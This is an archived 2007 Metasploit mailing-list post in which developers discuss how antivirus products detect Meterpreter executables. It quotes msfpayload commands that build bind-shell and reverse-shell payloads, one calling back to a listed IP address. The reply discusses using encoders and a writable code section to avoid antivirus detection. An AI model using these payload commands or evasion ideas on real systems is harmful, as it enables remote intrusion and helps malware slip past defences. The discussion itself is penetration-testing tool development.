Metasploit mailing list archives
Connect to a remote windows host with valid credentials (no exploit)
From: mmiller at hick.org (mmiller at hick.org)
Date: Fri, 1 Jun 2007 13:32:17 -0700
On Fri, Jun 01, 2007 at 03:13:01PM -0500, Kurt Grutzmacher wrote:
On Fri, Jun 01, 2007 at 04:50:23PM +0200, Nicolas FR wrote:- Kaspersky 6.0 detects the payload and blocks the .exe when the exploit is launched (warning about "Buffer Overflow"); Kaspersky does a good job on this, I am positively surprised.I made a meterpreter listener and reverse and uploaded them to virustotal.com: $ ./msfpayload windows/meterpreter/bind_tcp LPORT=5512 X > metbind-5512.exe $ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.221.55.2 LPORT=5512 X > metreverse-5512.exe Only three found them suspicious, Fortinet 2.85.0.0, Panda 9.0.0.4 and Webwasher-Gateway 6.0.1 .. That could change in the future. Symantec 10 used to complain, not sure what changed. :) If only a clean EXE would be created with a real exit() call or something. Having the debug handler kick in after doing a 'quit' really sucks.
I committed a change to trunk to allow you to specify an encoder through the ENCODER option on the command line (case sensitive). You might try generating an executable using an encoder and see what AVs come back with. The only problem will be that a number of the encoders assume the ability to do in-place decoding which won't work with the current executable template (because the code section is readonly). It might be possible for us to modify the template to have the code section be mapped execute/read/write. I wonder if AV flags that as suspicious :)
Current thread:
- Connect to a remote windows host with valid credentials (no exploit) Nicolas FR (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) H D Moore (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) Talha (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) Nicolas FR (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) H D Moore (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) Nicolas FR (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) Kurt Grutzmacher (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) H D Moore (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) Kurt Grutzmacher (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) mmiller at hick.org (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) H D Moore (Jun 01)